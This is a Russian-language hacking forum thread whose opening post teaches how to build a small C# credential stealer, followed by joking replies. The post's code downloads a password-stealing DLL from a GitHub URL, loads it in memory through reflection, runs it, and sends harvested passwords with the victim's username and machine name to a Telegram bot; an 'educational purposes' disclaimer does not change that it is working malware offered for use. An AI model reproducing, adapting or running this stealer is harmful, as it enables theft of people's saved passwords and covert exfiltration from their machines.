Загрузка...

Writing a Steeler for the "Poor"

Thread in Virology created by zellun Dec 21, 2020. 1612 views

  1. zellun
    zellun Topic starter Dec 21, 2020 мульт? 110 Jan 2, 2018
    Привет, сегодня сделаем ******* из говна и палок который будет догружать DLL в память и вызывать функцию, которая будет вытаскивать пароли и отправлять нам в телегу. Особенный он тем, что весит всего 9кб!

    Будем юзать пространство имен System.Reflections

    ( Необходимо создать проект "Консольное приложение (.Net Framework)" )

    Code
    public static byte[] GetLibrary()
    {
    byte[] dll = new byte[0];
    string url = "https://raw.githubusercontent.com/L1ghtM4n/DynamicStealer/main/DLL/PasswordStealer.dll";
    using (var client = new WebClient())
    {
    try {
    dll = client.DownloadData(url);
    } catch (WebException) {
    Environment.Exit(1);
    }
    }
    return dll;
    }

    Теперь напишем функцию GetPasswords которая:
    • принимает байты дллки,
    • загружает её,
    • вызывает функцию оттуда,
    • и возвращает пароли нам.
    Code
    public static string GetPasswords(byte[] dll)
    {
    // Загрузить дллку
    Assembly asm = Assembly.Load(dll);

    // Создать экземпляр
    dynamic instance = Activator.CreateInstance(
    asm.GetType("PasswordStealer.*******"));

    // Получить функцию восстановления паролей из дллки
    MethodInfo runMethod = instance.GetType().GetMethod("Run",
    BindingFlags.Instance | BindingFlags.Public);

    // Вызов метода восстановления паролей
    string passwords = (string)runMethod.Invoke(
    instance, new object[] { });

    // Возвращаем пассы
    return passwords;
    }

    Функция UploadReport будет отправлять пароли в телегу
    Code
    public static bool UploadReport(string passwords)

    {
    string report = $"*New report*\n" +
    $"*UserName:* {Environment.UserName}\n" +
    $"*CompName:* {Environment.MachineName}\n\n" +
    $"*Passwords:* \n{passwords}";
    string telegram_api = "https://api.telegram.org/bot";
    using (var client = new WebClient())
    {
    try
    {
    string response = client.DownloadString(
    telegram_api + "<Your_Token>" +
    "/sendMessage?chat_id=<CHAT_ID>"+
    "&text=" + report +
    "&disable_web_page_preview=True" +
    "&parse_mode=Markdown"
    );
    return response.Contains("\"ok\":true,");
    }
    catch (WebException)
    {
    return false;
    }
    }
    }

    И главная функция:
    Code
    static void Main()[/B][/LEFT][/B][/LEFT][/B][/LEFT]
    [B]
    [LEFT][B]
    [LEFT][B][LEFT]{
    // Это надо для правильной отправки
    ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls
    | SecurityProtocolType.Tls11
    | SecurityProtocolType.Tls12
    | SecurityProtocolType.Ssl3;

    byte[] dll = GetLibrary(); // Скачать байты dll
    string pwd = GetPasswords(dll); // Вызов методов dll и возврат паролей
    UploadReport(pwd); // Отправляем пароли боту Telegram
    }





    Пример работы:

    [IMG]

    Паролем служит текст oG91lwnpkRF6k2Fi, защифрованный "Шифром Цезаря" со сдвигом в 10 единиц и полученный текст это Base64. Удачи!


    Статья предоставлена исключительно в ознакомительных целях! Я не несу ответственность за ваши действия.
     
  2. BlackCloud
    BlackCloud Dec 21, 2020 lolz.live/threads/2883725/ Скупка Fortnite 4478 Aug 16, 2019
    давайте еще и ему авторку дадим
     
    1. zellun Topic starter
      BlackCloud, ахахх почему бы и нет
  3. Ole4ka_Buz
    Ole4ka_Buz Dec 21, 2020 Собираю на розыгрыш 0/500 507 Aug 11, 2020
    А чо так многа шоле где краткое содержание?
     
    1. zellun Topic starter
  4. dudeusell
    dudeusell Dec 21, 2020 Banned 33 Jun 2, 2019
    Ну все, ожидайте экипаж
     
    1. zellun Topic starter
      dudeusell, не надо пожалуйста
    2. dudeusell
      zellun,
      20 декабря
      День работника органов безопасности Российской Федерации 2020 (Россия)|
      Амнистия. В честь праздника
    3. zellun Topic starter
  5. Cartman4eg
    Cartman4eg Dec 21, 2020 Credula res amor est. 40 Nov 13, 2020
    Писать ****** для бедных, чтобы бедные стилили бедных, это просто интелектуальность интелектуальная. :facepalm:
     
    1. zellun Topic starter
  6. 3blamobl4
    3blamobl4 Dec 21, 2020 Banned 1 Dec 21, 2020
    блять епта какой пароль нахуй епта я нахуй сидел 20 минут расшифровывал получилось yQ91vgxzuBP6u2Ps и нихуя не подходит
     
    1. View previous comments (1)
    2. CoderVir
      3blamobl4, очень лёгкий пароль. О чём ты
    3. zellun Topic starter
      @CoderVir, +
  7. ANALWORM
    ANALWORM Dec 23, 2020 Статус: 2 Dec 27, 2019
    ctrl c + ctrl v
    Даже гифку не свою вставил :finger_up:
     
  8. ANALWORM
    ANALWORM Jan 11, 2021 Статус: 2 Dec 27, 2019
    1. View previous comments (1)
    2. ANALWORM
      XMineLGrifs, Это говно *******, который пиздит онли пассы :finger_up:
      А так, я знаю, сливал уже не раз
    3. XMineLGrifs
      ANALWORM, где найти клоунов которые сторм кити, елешон юзают?
      Интересно где такие водятся. Вчера все читы с ютуба на кс го скачал, 0 телеграмм *******ов
    4. ANALWORM
Loading...
Top